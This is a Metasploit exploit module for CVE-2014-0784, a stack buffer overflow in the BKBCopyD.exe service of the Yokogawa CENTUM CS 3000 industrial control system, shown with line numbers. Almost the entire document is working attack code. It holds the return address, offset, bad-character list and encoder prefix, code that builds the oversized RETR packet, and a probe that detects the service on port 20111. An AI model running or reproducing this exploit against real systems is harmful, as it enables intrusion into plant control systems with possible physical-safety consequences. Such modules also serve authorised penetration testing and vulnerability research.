Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
16
        exists in the service BKBCopyD.exe when handling specially crafted packets. This module has
17
        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.
18
      },
19
      'Author'         =>
20
        [
21
          'juan vazquez',
22
          'Redsadic <julian.vilas[at]gmail.com>'
23
        ],
24
      'References'     =>
25
        [
26
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
27
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ],
28
          [ 'CVE', '2014-0784']
29
        ],
30
      'Payload'        =>
31
        {
32
          'Space'          => 373, # 500 for the full RETR argument
33
          'DisableNops'    => true,
34
          'BadChars'       => "\x00\x0d\x0a\xff",
35
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff\xff\xff" # Stack adjustment # add esp, -3500 # double \xff char to put it on memory
36
        },
37
      'DefaultOptions' =>
38
        {
39
          'EXITFUNC' => 'thread',
40
        },
41
      'Platform'       => 'win',
42
      'Targets'        =>
43
        [
44
          [ 'Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3',
45
            {
46
              'Ret'    => 0x6404625d, # push esp # ret # libBKBUtil.dll]
47
              'Offset' => 123
48
            }
49
          ],
50
        ],
51
      'DisclosureDate' => '2014-03-10',
52
      'DefaultTarget'  => 0))
53

54
    register_options(
55
      [
56
        Opt::RPORT(20111)
57
      ])
58
  end
59

60
  def check
61
    pkt = build_probe
62
    res = send_pkt(pkt)
63
    if valid_response?(res)
64
      return Exploit::CheckCode::Detected
65
    end
66

67
    Exploit::CheckCode::Safe
68
  end
69

70

71
  def exploit
72
    data = "RETR "
73
    data << rand_text(target['Offset'])
74
    data << [target.ret].pack("V")
75
    data << payload.encoded
76
    data << "\n"
77

78
    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
79
    connect
80
    sock.put(data)
81
    disconnect
82
  end
83

84
  def build_probe
85
    "#{rand_text_alpha(10)}\n"
86
  end
87

88
  def send_pkt(data)
89
    connect
90
    sock.put(data)
91
    data = sock.get_once
92
    disconnect
93

94
    return data
95
  end
96

97
  def valid_response?(data)
98
    return false unless !!data
99
    return false unless data =~ /500  'yyparse error': command not understood/
100
    return true
101
  end
102
end
103

104

105